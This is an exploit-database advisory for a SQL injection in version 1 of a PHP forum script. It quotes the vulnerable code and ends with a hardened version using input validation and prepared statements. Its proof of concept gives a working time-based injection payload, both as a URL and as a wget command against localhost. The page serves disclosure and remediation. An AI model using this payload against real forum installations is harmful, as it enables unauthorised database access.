Simple Free PHP Forum Script - exploit.company
Vendor: Simple Free PHP Forum Script
By: Skraps, Jackie Craig Sparks
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Simple Free PHP Forum Script
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2011

Simple Free PHP Forum Script <= 1 SQL Injection Vulnerability

This script is riddled with unsanitized REQUEST variables that allow multiple SQL injections. The PoC shows one example of an SQL injection attack (a time-based payload using BENCHMARK()). The vulnerable code is at line 150 of the discussion.php file, where the id parameter is interpolated directly into a SELECT statement.

Mitigation:

To mitigate this vulnerability, validate all user input before it reaches a SQL query, and build the query with prepared statements (parameterized queries) so that the input is passed as data and can never alter the query structure.
Source

Exploit-DB raw data:

# Exploit Title: Simple Free PHP Forum Script <= 1 SQL Injection Vulnerability
# Date: 2011-10-19
# Author: Skraps, Jackie Craig Sparks(jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://www.phpforumscript.com/?page_id=11
# Version: 1 (tested)

This script is riddled with unsanitized REQUEST variables that allow multiple SQL injections.

--------------
     PoC
--------------
http://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1

wget "http://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1"

--------------
Vulnerable Code
--------------
Line 150 of discussion.php:
case 'cat':
    // id comes straight from $_REQUEST with no validation or escaping
    $get_id = $_REQUEST["id"];
    $page->Set("cat_id", $get_id);
    // the raw value is interpolated into the SQL string, which is the injection point
    $query = "SELECT * FROM discussion_category WHERE id='$get_id' LIMIT 1";
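The following is an added example, not code from the forum script or from the advisory author, showing how the 'cat' branch quoted above would look once the mitigation described in the Mitigation section is applied: the id is validated as a positive integer and the lookup is done through a PDO prepared statement. The $pdo connection, the $page object and the function names are assumptions for illustration; the table and column names are taken from the query quoted in the advisory.

```php
<?php
// Added example (not the forum script's own code): the 'cat' case of
// discussion.php rewritten with input validation and a PDO prepared
// statement. $pdo and $page are assumed to exist; the connection should be
// created with PDO::ATTR_EMULATE_PREPARES => false so MySQL performs real
// server-side parameter binding rather than client-side string building.
declare(strict_types=1);

/**
 * Validate the category id. The quoted query compares against an id column,
 * so only a positive integer is acceptable; anything else (including a
 * payload such as "1' AND 1=IF(...)", an empty string, null or an array) is
 * rejected before it gets near the database.
 */
function validateCategoryId(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Fetch one category row by id with a parameterized query. The SQL text is
 * fixed; the value travels to the server separately as a bound parameter,
 * so its contents cannot change the query structure.
 */
function fetchCategory(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM discussion_category WHERE id = :id LIMIT 1');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Vulnerable original, as quoted in the advisory, for contrast:
//   $get_id = $_REQUEST["id"];
//   $query  = "SELECT * FROM discussion_category WHERE id='$get_id' LIMIT 1";

// Hardened replacement for the same case:
switch ($_REQUEST['show'] ?? '') {
    case 'cat':
        $get_id = validateCategoryId($_REQUEST['id'] ?? null);
        if ($get_id === null) {
            http_response_code(400);
            exit('Invalid category id');
        }
        $page->Set('cat_id', $get_id);            // $page: the script's own object (assumed)
        $category = fetchCategory($pdo, $get_id); // $pdo: assumed PDO connection
        if ($category === null) {
            http_response_code(404);
            exit('No such category');
        }
        break;
}
```

The integer check alone would already block the quoted payload, but the prepared statement is the control that holds regardless of how the validation evolves; validation narrows the input, parameterization guarantees the input stays data. Applying the same pattern to every other $_REQUEST value the script interpolates into SQL is what closes the class of bug the advisory describes.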